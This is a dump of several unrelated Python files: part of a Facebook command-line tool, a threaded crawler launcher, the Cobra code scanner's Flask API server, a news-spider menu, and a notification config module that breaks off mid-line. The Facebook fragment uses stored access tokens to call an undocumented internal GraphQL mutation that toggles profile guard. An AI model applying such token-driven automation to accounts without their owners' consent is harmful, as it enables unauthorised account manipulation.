jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 52 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() except IOError: print '\x1b[1;91m[!] 
Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def guard(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Enable' print '║-> \x1b[1;37;40m2. Disable' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if g == '1': aktif = 'true' gaz(toket, aktif) else: if g == '2': non = 'false' gaz(toket, non) else: if g == '0': lain() else: if g == '': keluar() else: keluar() def get_userid(toket): url = 'https://graph.facebook.com/me?access_token=%s' % toket res = requests.get(url) uid = json.loads(res.text) return uid['id'] def gaz(toket, enable=True): id = get_userid(toket) data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id)) headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket} url = 'https://graph.facebook.com/graphql' res = requests.post(url, data=data, headers=headers) print res.text if '"is_shielded":true' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: if '"is_shielded":false' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: print '\x1b[1;91m[!] Error' keluar() if __name__ == '__main__': login()
multi_start.py
# -*- coding: utf-8 -*-
"""
# @Time : 2019/7/4 18:27
# @Author : 王诚坤
# @File : multi_start.py
# @des : multi-threaded launcher
"""
from multi_haodf import getContent
import threading
from tools import ConnectDatabase as conn


def main():
    # Open the database connection used for the query
    select_conn = conn.MySQLCommand()
    select_conn.connectMysql(table="all_url")
    # Ask how many worker threads to start per round
    num = int(input("Threading Number:\t"))
    print("Current Number:\t %d" % num)
    # Worker entry point
    start = getContent.start
    # Select the URLs that still need to be crawled
    title_list = ["qa_number", "qa_url"]
    situation = "WHERE qa_status = '0' or qa_status ='3'"
    select_cursor = select_conn.select_order(title_list=title_list, situation=situation)
    # A flag controls the outer loop
    tag = True
    while tag:
        th_list = []
        for i in range(num):
            temp_result = select_cursor.fetchmany(10)
            if not temp_result:  # an exhausted cursor returns an empty sequence
                tag = False
                break
            th = threading.Thread(target=start, args=(temp_result,))
            th.start()
            th_list.append(th)
        # Make the main thread wait for all workers in this round to finish
        for t in th_list:
            t.join()
    # Close the database connection
    select_conn.closeMysql()


if __name__ == '__main__':
    main()
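The launcher above re-creates and joins a fresh batch of threading.Thread objects on every pass through the loop. Below is a minimal sketch of the same batch-dispatch idea using concurrent.futures instead; fetch_batches and process_batch are hypothetical stand-ins for select_cursor.fetchmany and getContent.start, not names from this project.

# A minimal sketch, not project code: hand each batch of rows to a thread
# pool instead of creating and joining threads by hand every round.
from concurrent.futures import ThreadPoolExecutor


def fetch_batches(cursor, size=10):
    """Hypothetical helper: yield row batches until the cursor is exhausted."""
    while True:
        rows = cursor.fetchmany(size)
        if not rows:  # an empty sequence means no more rows
            break
        yield rows


def run_all(cursor, process_batch, workers=4):
    # map() keeps at most `workers` batches in flight and blocks until all finish
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for _ in pool.map(process_batch, fetch_batches(cursor)):
            pass

One practical difference: the pool caps concurrency at a fixed worker count, whereas the original spawns `num` new threads per round and waits for the slowest one before starting the next wave.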
api.py
# -*- coding: utf-8 -*- """ api ~~~ Implements API Server and Interface :author: Feei <feei@feei.cn> :homepage: https://github.com/WhaleShark-Team/cobra :license: MIT, see LICENSE for more details. :copyright: Copyright (c) 2018 Feei. All rights reserved """ import datetime import errno import json import multiprocessing import os import re import socket import subprocess import threading import time import traceback import requests from flask import Flask, request, render_template, Blueprint from flask_restful import Api, Resource, reqparse from werkzeug.urls import url_unquote from . import cli from .cli import get_sid from .config import Config, running_path, package_path from .engine import Running from .log import logger from .utils import allowed_file, secure_filename, PY2, split_branch try: # Python 3 import queue from urllib.parse import urlparse, quote_plus except ImportError: # Python 2 import Queue as queue from urlparse import urlparse from urllib import quote_plus q = queue.Queue() app = Flask(__name__, static_folder='templates/asset') running_host = '0.0.0.0' running_port = 5000 def producer(task): q.put(task) def consumer(): while True: task = q.get() p = multiprocessing.Process(target=cli.start, args=task) p.start() p.join() q.task_done() class AddJob(Resource): @staticmethod def post(): data = request.json if not data or data == "": return {"code": 1003, "msg": "Only support json, please post json data."} target = data.get("target") formatter = data.get("formatter") output = data.get("output") rule = data.get("rule") is_del = data.get("dels") is_valid_key = key_verify(data=data) if is_valid_key is not True: return is_valid_key if not target or target == "": return {"code": 1002, "msg": "URL cannot be empty."} if not formatter or formatter == '': formatter = 'json' if not output or output == '': output = '' if not rule or rule == '': rule = '' if not is_del or is_del == '': is_del = False # Report All Id a_sid = get_sid(target, True) running = Running(a_sid) # Write a_sid running data running.init_list(data=target) # Write a_sid running status data = { 'status': 'running', 'report': '' } running.status(data) if isinstance(target, list): for t in target: # Scan if re.match(r'http://|https://', t): arg = (t, formatter, output, rule, a_sid, is_del) producer(task=arg) else: return {"code": 1004, "msg": "Please input a valid URL"} result = { 'msg': 'Add scan job successfully.', 'sid': a_sid, 'total_target_num': len(target), } else: if re.match(r'http://|https://', target): arg = (target, formatter, output, rule, a_sid, is_del) producer(task=arg) else: return {"code": 1004, "msg": "Please input a valid URL"} result = { 'msg': 'Add scan job successfully.', 'sid': a_sid, 'total_target_num': 1, } return {"code": 1001, "result": result} class JobStatus(Resource): @staticmethod def post(): data = request.json if not data or data == "": return {"code": 1003, "msg": "Only support json, please post json data."} sid = data.get("sid") is_valid_key = key_verify(data=data) if is_valid_key is not True: return is_valid_key if not sid or sid == "": return {"code": 1002, "msg": "sid is required."} sid = str(data.get("sid")) # 需要拼接入路径,转为字符串 running = Running(sid) if running.is_file() is not True: data = { 'code': 1004, 'msg': 'scan id does not exist!', 'sid': sid, 'status': 'no such scan', 'report': '' } return data else: result = running.status() r_data = running.list() allow_deploy = True total_vul_number = critical_vul_number = high_vul_number = medium_vul_number = low_vul_number = 0 if 
result['status'] == 'running': ret = True result['still_running'] = dict() for s_sid, git in r_data['sids'].items(): if Running(s_sid).is_file(True) is False: result['still_running'].update({s_sid: git}) ret = False if ret: result['status'] = 'done' running.status(result) elif result['status'] == 'done': # 统计各类漏洞数量,并给出上线风险评估 targets = list() scan_list = Running(sid).list() for s_sid, target_str in scan_list.get('sids').items(): target_info = dict() # 分割项目地址与分支,默认 master target, branch = split_branch(target_str) target_info.update({ 'sid': s_sid, 'target': target, 'branch': branch, }) s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid)) with open(s_sid_file, 'r') as f: s_sid_data = json.load(f) if s_sid_data.get('code') != 1001: continue else: s_sid_data = s_sid_data.get('result') total_vul_number += len(s_sid_data.get('vulnerabilities')) target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))}) target_info.update(s_sid_data) targets.append(target_info) for vul in s_sid_data.get('vulnerabilities'): if 9 <= int(vul.get('level')) <= 10: critical_vul_number += 1 elif 6 <= int(vul.get('level')) <= 8: high_vul_number += 1 elif 3 <= int(vul.get('level')) <= 5: medium_vul_number += 1 elif 1 <= int(vul.get('level')) <= 2: low_vul_number += 1 if critical_vul_number > 0: allow_deploy = False data = { 'msg': 'success', 'sid': sid, 'status': result.get('status'), 'report': request.url_root + result.get('report'), 'still_running': result.get('still_running'), 'total_target_num': r_data.get('total_target_num'), 'statistic': { 'critical': critical_vul_number, 'high': high_vul_number, 'medium': medium_vul_number, 'low': low_vul_number }, 'allow_deploy': allow_deploy, 'not_finished': int(r_data.get('total_target_num')) - len(r_data.get('sids')) + len(result.get('still_running')), } return {"code": 1001, "result": data} class FileUpload(Resource): @staticmethod def post(): """ Scan by uploading compressed files :return: """ if 'file' not in request.files: return {'code': 1002, 'result': "File can't empty!"} file_instance = request.files['file'] if file_instance.filename == '': return {'code': 1002, 'result': "File name can't empty!"} if file_instance and allowed_file(file_instance.filename): filename = secure_filename(file_instance.filename) dst_directory = os.path.join(package_path, filename) file_instance.save(dst_directory) # Start scan a_sid = get_sid(dst_directory, True) data = { 'status': 'running', 'report': '' } Running(a_sid).status(data) try: cli.start(dst_directory, None, 'stream', None, a_sid=a_sid) except Exception as e: traceback.print_exc() code, result = 1001, {'sid': a_sid} return {'code': code, 'result': result} else: return {'code': 1002, 'result': "This extension can't support!"} class ResultData(Resource): @staticmethod def post(): """ pull scan result data. 
:return: """ data = request.json if not data or data == "": return {"code": 1003, "msg": "Only support json, please post json data."} s_sid = data.get('sid') if not s_sid or s_sid == "": return {"code": 1002, "msg": "sid is required."} s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid)) if not os.path.exists(s_sid_file): return {'code': 1002, 'msg': 'No such target.'} with open(s_sid_file, 'r') as f: scan_data = json.load(f) if scan_data.get('code') == 1001: scan_data = scan_data.get('result') else: return { 'code': scan_data.get('code'), 'msg': scan_data.get('msg'), } rule_filter = dict() for vul in scan_data.get('vulnerabilities'): rule_filter[vul.get('id')] = vul.get('rule_name') return { 'code': 1001, 'result': { 'scan_data': scan_data, 'rule_filter': rule_filter, } } class ResultDetail(Resource): @staticmethod def post(): """ get vulnerable file content :return: """ data = request.json if not data or data == "": return {'code': 1003, 'msg': 'Only support json, please post json data.'} sid = data.get('sid') file_path = url_unquote(data.get('file_path')) if not sid or sid == '': return {"code": 1002, "msg": "sid is required."} if not file_path or file_path == '': return {'code': 1002, 'msg': 'file_path is required.'} s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=sid)) if not os.path.exists(s_sid_file): return {'code': 1002, 'msg': 'No such target.'} with open(s_sid_file, 'r') as f: target_directory = json.load(f).get('result').get('target_directory') if not target_directory or target_directory == '': return {'code': 1002, 'msg': 'No such directory'} if PY2: file_path = map(secure_filename, [path.decode('utf-8') for path in file_path.split('/')]) else: file_path = map(secure_filename, [path for path in file_path.split('/')]) filename = target_directory for _dir in file_path: filename = os.path.join(filename, _dir) if os.path.exists(filename): extension = guess_type(filename) if is_text(filename): with open(filename, 'r') as f: file_content = f.read() else: file_content = 'This is a binary file.' else: return {'code': 1002, 'msg': 'No such file.'} return {'code': 1001, 'result': {'file_content': file_content, 'extension': extension}} class Search(Resource): @staticmethod def post(): """ Search specific rule. 
:return: """ data = request.json if not data or data == "": return {'code': 1003, 'msg': 'Only support json, please post json data.'} sid = data.get('sid') if not sid or sid == '': return {'code': 1002, 'msg': 'sid is required.'} rule_id = data.get('rule_id') if not rule_id or rule_id == '': return {'code': 1002, 'msg': 'rule_id is required.'} scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=sid)) if not os.path.exists(scan_list_file): return {'code': 1002, 'msg': 'No such sid.'} with open(scan_list_file, 'r') as f: scan_list = json.load(f) if not isinstance(rule_id, list): rule_id = [rule_id] search_data = list() for s_sid in scan_list.get('sids').keys(): target, branch = split_branch(scan_list.get('sids').get(s_sid)) search_result = search_rule(s_sid, rule_id) cvi_count = list(search_result.values()) if int(cvi_count[0]) > 0: search_data.append({ 'target_info': { 'sid': s_sid, 'target': target, 'branch': branch, }, 'search_result': search_result, }) return { 'code': 1001, 'result': search_data, } class GetMemeber(Resource): parser = reqparse.RequestParser() parser.add_argument('repo-url', type=str, required=True, help='repo-url 不能为空,格式为 http://xxx.xxx.com/user/reponame.git') def get(self): """ 从 GitLab API 获取项目负责人 :return: """ data = self.parser.parse_args() repo_url = data.get('repo-url') url_parser = urlparse(repo_url) if 'gitlab' in url_parser.netloc: _, members = self.get_member(url_parser=url_parser) if _: if members: return { 'code': 1001, 'result': { 'members': members, }, } else: return { 'code': 1002, 'msg': 'Empty members', } else: return { 'code': 1002, 'msg': members } else: return { 'code': 1002, 'msg': 'Not support repo type' } @staticmethod def get_member(url_parser): """ 请求 GitLab API :param url_parser: urlparse(repo_url) :return: """ domain = url_parser.netloc scheme = url_parser.scheme repo = re.sub(r"\.git.*", "", url_parser.path) # 去掉 repo 开头的 / repo = repo[1:] if repo.startswith('/') else repo api_url = scheme + '://' + domain + '/api/v3/projects/' + quote_plus(repo) + '/members' try: private_token = Config(level1="git", level2="private_token").value if private_token == '': return False, 'No private token specified' header = { 'PRIVATE-TOKEN': private_token } data = requests.get(url=api_url, headers=header, timeout=3).json() members = [] for m in data: members.append(m.get('username')) return True, members except Exception as e: return False, str(e) @app.route('/report', methods=['GET']) def report(): """ get report :return: """ data_lists = [] total_files = 0 total_vul_number = critical_vul_number = high_vul_number = medium_vul_number = low_vul_number = 0 rule_num = dict() target_directorys = [] time_range = {} time_start = request.args.get(key='start') time_end = request.args.get(key='end') if time_start is None and time_end is None: time_start = datetime.datetime.today() + datetime.timedelta(days=-7) time_end = datetime.datetime.today().strftime("%Y-%m-%d") time_start = time_start.strftime("%Y-%m-%d") if time_start is not None and time_end is not None: if PY2: time_start = time_start.encode('utf-8') time_end = time_end.encode('utf-8') if time_start is not '' and time_end is not '': time_str = "%Y-%m-%d" date_time_str = "%m-%d" t_start = datetime.datetime.strptime(time_start, time_str) t_end = datetime.datetime.strptime(time_end, time_str) t_end += datetime.timedelta(days=1) t_start_tuple = t_start.timetuple() t_end_tuple = t_end.timetuple() t_start_un = time.mktime(t_start_tuple) t_end_un = time.mktime(t_end_tuple) while t_start < t_end: 
time_range[t_start.strftime(date_time_str)] = 0 t_start += datetime.timedelta(days=1) for data_file in os.listdir(running_path): if re.match(r'.*_data', data_file): data = os.path.join(running_path, data_file) data_time = os.path.getctime(filename=data) if t_start_un < data_time < t_end_un: data_time = time.strftime(date_time_str, time.localtime(data_time)) with open(data, 'r') as f: try: data_content = json.load(f) except json.JSONDecodeError: logger.warning('[REPORT] Delete empty data file: {}'.format(data_file)) os.remove(data) continue data_results = data_content.get('result') if data_results: target_directory = data_results.get('target_directory') if target_directory in target_directorys: continue else: target_directorys.append(target_directory) data_lists.append(data) total_files += data_results.get('file') total_vul_number += len(data_results.get('vulnerabilities')) time_range[data_time] += len(data_results.get('vulnerabilities')) for vul in data_results.get('vulnerabilities'): if 9 <= int(vul.get('level')) <= 10: critical_vul_number += 1 elif 6 <= int(vul.get('level')) <= 8: high_vul_number += 1 elif 3 <= int(vul.get('level')) <= 5: medium_vul_number += 1 elif 1 <= int(vul.get('level')) <= 2: low_vul_number += 1 try: rule_num[vul.get('rule_name')] += 1 except KeyError: rule_num[vul.get('rule_name')] = 1 else: logger.debug('[REPORT] Empty result in {0}'.format(data_file)) time_range = sorted_dict(time_range) return render_template(template_name_or_list='report_my.html', time_start=time_start, time_end=time_end, total=len(data_lists), total_files=total_files, critical_vul_number=critical_vul_number, high_vul_number=high_vul_number, medium_vul_number=medium_vul_number, low_vul_number=low_vul_number, total_vul_number=total_vul_number, rule_num=rule_num, time_range=time_range) class GetSSid(Resource): @staticmethod def post(): data = request.json sid = data.get('sid') scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=sid)) if not os.path.exists(scan_list_file): return {'code': 1002, 'msg': 'No such sid.'} with open(scan_list_file, 'r') as f: s_sid = json.load(f) key = None if 'sids' in s_sid and len(s_sid['sids'].keys()) != 0: key = s_sid['sids'].keys()[0] return {'code': 1001, 'result': {'s_sid': key}} @app.route('/', methods=['GET', 'POST']) def summary(): a_sid = request.args.get(key='sid') enable_web_ui = Config(level1="cobra", level2="enable_web_ui").value # so ugly !!!! 
if enable_web_ui is not '1': return render_template(template_name_or_list='disable.html') key = Config(level1="cobra", level2="secret_key").value if a_sid is None: return render_template(template_name_or_list='index.html', key=key) status_url = 'http://{host}:{port}/api/status'.format(host=running_host, port=running_port) post_data = { 'key': key, 'sid': a_sid, } headers = { "Content-Type": "application/json", } r = requests.post(url=status_url, headers=headers, data=json.dumps(post_data)) try: scan_status = json.loads(r.text) except ValueError as e: return render_template(template_name_or_list='error.html', msg='Check scan status failed: {0}'.format(e)) if scan_status.get('code') != 1001: return render_template(template_name_or_list='error.html', msg=scan_status.get('msg')) else: if scan_status.get('result').get('status') == 'running': still_running = scan_status.get('result').get('still_running') for s_sid, target_str in still_running.items(): target, branch = split_branch(target_str) still_running[s_sid] = {'target': target, 'branch': branch} else: still_running = dict() scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid)) scan_list = Running(a_sid).list() start_time = os.path.getctime(filename=scan_status_file) start_time = time.localtime(start_time) start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time) total_targets_number = scan_status.get('result').get('total_target_num') not_finished_number = scan_status.get('result').get('not_finished') total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0 rule_num = dict() rules = dict() targets = list() for s_sid, target_str in scan_list.get('sids').items(): if s_sid not in still_running: target_info = dict() # 分割项目地址与分支,默认 master target, branch = split_branch(target_str) target_info.update({ 'sid': s_sid, 'target': target, 'branch': branch, }) s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid)) with open(s_sid_file, 'r') as f: s_sid_data = json.load(f) if s_sid_data.get('code') != 1001: continue else: s_sid_data = s_sid_data.get('result') total_vul_number += len(s_sid_data.get('vulnerabilities')) target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))}) target_info.update(s_sid_data) targets.append(target_info) for vul in s_sid_data.get('vulnerabilities'): if 9 <= int(vul.get('level')) <= 10: critical_vul_number += 1 elif 6 <= int(vul.get('level')) <= 8: high_vul_number += 1 elif 3 <= int(vul.get('level')) <= 5: medium_vul_number += 1 elif 1 <= int(vul.get('level')) <= 2: low_vul_number += 1 try: rule_num[vul.get('rule_name')] += 1 except KeyError: rule_num[vul.get('rule_name')] = 1 rules[vul.get('id')] = vul.get('rule_name') return render_template(template_name_or_list='summary.html', total_targets_number=total_targets_number, not_finished_number=not_finished_number, start_time=start_time, targets=targets, a_sid=a_sid, total_vul_number=total_vul_number, critical_vul_number=critical_vul_number, high_vul_number=high_vul_number, medium_vul_number=medium_vul_number, low_vul_number=low_vul_number, rule_num=rule_num, rules=rules, running=still_running, ) def key_verify(data): key = Config(level1="cobra", level2="secret_key").value _key = data.get("key") if _key == key: return True elif not _key or _key == "": return {"code": 1002, "msg": "Key cannot be empty."} elif not _key == key: return {"code": 4002, "msg": "Key verify failed."} else: return {"code": 4002, "msg": "Unknown key verify error."} def is_text(fn): msg = 
subprocess.Popen(['file', fn], stdout=subprocess.PIPE).communicate()[0]
    return 'text' in msg.decode('utf-8')


def guess_type(fn):
    import mimetypes
    extension = mimetypes.guess_type(fn)[0]
    if extension:
        """text/x-python or text/x-java-source"""
        # extension = extension.split('/')[1]
        extension = extension.replace('-source', '')
    else:
        extension = fn.split('/')[-1].split('.')[-1]

    custom_ext = {
        'html': 'htmlmixed',
        'md': 'markdown',
    }
    if custom_ext.get(extension) is not None:
        extension = custom_ext.get(extension)

    return extension.lower()


def search_rule(sid, rule_id):
    """
    Search specific rule name in scan data.
    :param sid: scan data id
    :param rule_id: a list of rule name
    :return: {rule_name1: num1, rule_name2: num2}
    """
    scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=sid))
    search_result = dict.fromkeys(rule_id, 0)
    if not os.path.exists(scan_data_file):
        return search_result

    with open(scan_data_file, 'r') as f:
        scan_data = json.load(f)

    if scan_data.get('code') == 1001 and len(scan_data.get('result').get('vulnerabilities')) > 0:
        for vul in scan_data.get('result').get('vulnerabilities'):
            if vul.get('id') in rule_id:
                search_result[vul.get('id')] += 1
        return search_result
    else:
        return search_result


def sorted_dict(adict):
    adict = adict.items()
    return sorted(adict)


def start(host, port, debug):
    logger.info('Start {host}:{port}'.format(host=host, port=port))

    api = Blueprint("api", __name__)
    resource = Api(api)

    resource.add_resource(AddJob, '/api/add')
    resource.add_resource(JobStatus, '/api/status')
    resource.add_resource(GetSSid, '/api/get_ssid')
    resource.add_resource(FileUpload, '/api/upload')
    resource.add_resource(ResultData, '/api/list')
    resource.add_resource(ResultDetail, '/api/detail')
    resource.add_resource(Search, '/api/search')
    resource.add_resource(GetMemeber, '/api/members')

    app.register_blueprint(api)

    # consumer threads
    threads = []
    for i in range(5):
        threads.append(threading.Thread(target=consumer, args=()))

    for t in threads:
        t.daemon = True
        t.start()

    try:
        global running_port, running_host
        running_host = host if host != '0.0.0.0' else '127.0.0.1'
        running_port = port
        app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
    except socket.error as v:
        if v.errno == errno.EACCES:
            logger.critical('[{err}] Root permission is required to start the API Server on this port!'.format(err=v.strerror))
            exit()
        else:
            logger.critical('{msg}'.format(msg=v.strerror))

    logger.info('API Server start success')
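# ---------------------------------------------------------------------------
# Illustrative client sketch (an addition, not part of the original module):
# polls the /api/status endpoint registered in start() above, mirroring the
# request that summary() builds. It assumes the server is already running,
# that `key` is the configured cobra secret_key, and that `sid` is a scan id
# returned by a previous /api/add call; requests and json are imported at the
# top of this module.
# ---------------------------------------------------------------------------
def example_poll_status(host, port, key, sid):
    """Return the 'result' payload of /api/status, or raise on failure."""
    status_url = 'http://{host}:{port}/api/status'.format(host=host, port=port)
    headers = {'Content-Type': 'application/json'}
    post_data = {'key': key, 'sid': sid}
    r = requests.post(url=status_url, headers=headers, data=json.dumps(post_data))
    resp = json.loads(r.text)
    if resp.get('code') != 1001:
        raise RuntimeError(resp.get('msg'))
    # The result carries status, report, statistic, allow_deploy, still_running, ...
    return resp.get('result')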
news.py
import time from .spider.coldspider import datablogspider, collegespider, govspider, gongyispider, mediaspider from .spider.hotspider import hotspider, spider, rankspider, photospider from .spider.db import write_to_sys, db_img, pic_to_sys import threading # 部署爬虫唯一出入口main()方法 if __name__ == '__main__': # 定义break条件,timeiout变量: timeout = 0 print('==============================================================\n') print('neteasenews Spider is working now, give me some patience,ok?\n') print('==============================================================\n') print('1.爬虫全部运作\n') print('2.热更新(只更新即时性新闻)\n') print('3.冷更新(只更新变动频率低的新闻)\n') print('4.下载txt(需要数据库中存储有适量数据)\n') print('==============================================================\n') choices = int(input('请输入你的选择:\n\t\t\t')) print('--------------------------------------------------------------\n') if choices: # 如何从中断的数据开始,而不是从零开始?Redis?序列化操作?值得思考 if choices == 1: print('All of the Spider Will Be Running, Take It Easy!!!') # 获取所有json文档信息和跳转内容 spider() # 获取排行榜内容 rankspider() # 获取数读,新闻学院,政务,公益,媒体导航标签里面的内容,开启多线程. task_datablog = threading.Thread(target=datablogspider) task_colleges = threading.Thread(target=collegespider) task_gov = threading.Thread(target=govspider) task_gongyi = threading.Thread(target=gongyispider) task_media = threading.Thread(target=mediaspider) tasks = [task_datablog, task_colleges, task_gov, task_gongyi, task_media] for task in tasks: task.start() for task_ in tasks: task_.join() for task_run in tasks: if task_run.is_alive(): print('Task is running now') time.sleep(5) print('Spider will be off, wish no bugs or exceptions') print('大吉大利,今晚吃鸡') print('==============================================================\n') elif choices == 2: # 只更新首页推荐内容 hotspider() rankspider() # 理论上新闻更新速度根本没这么快,10S一篇新闻...666 print('please wait for 10s,it will run again!!') time.sleep(10) print('==============================================================\n') print('热更新完毕') print('大吉大利,今晚吃鸡') print('==============================================================\n') elif choices == 3: task_datablog = threading.Thread(target=datablogspider) task_colleges = threading.Thread(target=collegespider) task_gov = threading.Thread(target=govspider) task_gongyi = threading.Thread(target=gongyispider) task_media = threading.Thread(target=mediaspider) tasks = [task_datablog, task_colleges, task_gov, task_gongyi, task_media] for task in tasks: task.start() for task_ in tasks: task_.join() for task_run in tasks: if task_run.is_alive(): print('Task is running now') time.sleep(10) # 从网站获取pictures photospider() # 从数据库获取pictures db_img() time.sleep(5) print('==============================================================\n') print('冷更新完毕') print('大吉大利,今晚吃鸡') print('==============================================================\n') elif choices == 4: write_to_sys() pic_to_sys() print('==============================================================\n') print('下载完毕') print('大吉大利,今晚吃鸡') print('==============================================================\n') time.sleep(10) print('==============================================================\n') print('Spider will be off, wish no bugs or exceptions') print('\t\t\t大吉大利\t\t今晚吃鸡') print('==============================================================\n') # 展示部分数据
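# ---------------------------------------------------------------------------
# Illustrative sketch (an addition, not part of the original script): a
# non-interactive variant of choice 2 above, so the hot-update pass
# (hotspider + rankspider) can be driven by a scheduler instead of the
# input() menu. The rounds/interval values are placeholders.
# ---------------------------------------------------------------------------
def run_hot_update(rounds=3, interval=10):
    for _ in range(rounds):
        hotspider()
        rankspider()
        time.sleep(interval)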
notify_mtr.py
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ import base64 import hashlib import hmac import os import re import threading import time import urllib.parse from json import JSONDecodeError import json5 as json import requests from utils_env import get_file_path # 原先的 print 函数和主线程的锁 _print = print mutex = threading.Lock() # 定义新的 print 函数 def print(text, *args, **kw): """ 使输出有序进行,不出现多线程同一时间输出导致错乱的问题。 """ with mutex: _print(text, *args, **kw) # 通知服务 # fmt: off push_config = { 'HITOKOTO': False, # 启用一言(随机句子) 'BARK_PUSH': '', # bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm 'BARK_ARCHIVE': '', # bark 推送是否存档 'BARK_GROUP': '', # bark 推送分组 'BARK_SOUND': '', # bark 推送声音 'CONSOLE': True, # 控制台输出 'DD_BOT_SECRET': '', # 钉钉机器人的 DD_BOT_SECRET 'DD_BOT_TOKEN': '', # 钉钉机器人的 DD_BOT_TOKEN 'FSKEY': '', # 飞书机器人的 FSKEY 'GOBOT_URL': '', # go-cqhttp # 推送到个人QQ:http://127.0.0.1/send_private_msg # 群:http://127.0.0.1/send_group_msg 'GOBOT_QQ': '', # go-cqhttp 的推送群或用户 # GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ # /send_group_msg 时填入 group_id=QQ群 'GOBOT_TOKEN': '', # go-cqhttp 的 access_token 'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY 'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版 'PUSH_PLUS_TOKEN': '', # push+ 微信推送的用户令牌 'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码 'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY 'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE 'QYWX_AM': '', # 企业微信应用 'QYWX_KEY': '', # 企业微信机器人 'TG_BOT_TOKEN': '', # tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ 'TG_USER_ID': '', # tg 机器人的 TG_USER_ID,例:1434078534 'TG_API_HOST': '', # tg 代理 api 'TG_PROXY_AUTH': '', # tg 代理认证参数 'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST 'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT } notify_function = [] # fmt: on # 首先读取 面板变量 或者 github action 运行变量 for k in push_config: if v := os.getenv(k): push_config[k] = v # 读取配置文件中的变量 (会覆盖环境变量) CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.json5") if os.path.exists(CONFIG_PATH): print(f"通知配置文件存在:{CONFIG_PATH}。") try: for k, v in dict( json.load(open(CONFIG_PATH, mode="r", encoding="utf-8")) ).items(): if k in push_config: push_config[k] = v except ValueError: print( f"错误:配置文件 {CONFIG_PATH} 格式不对,请在 https://verytoolz.com/json5-validator.html 中检查格式" ) elif CONFIG_PATH: print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!") def bark(title: str, content: str) -> None: """ 使用 bark 推送消息。 """ if not push_config.get("BARK_PUSH"): print("bark 服务的 BARK_PUSH 未设置!!\n取消推送") return print("bark 服务启动") if push_config.get("BARK_PUSH").startswith("http"): url = 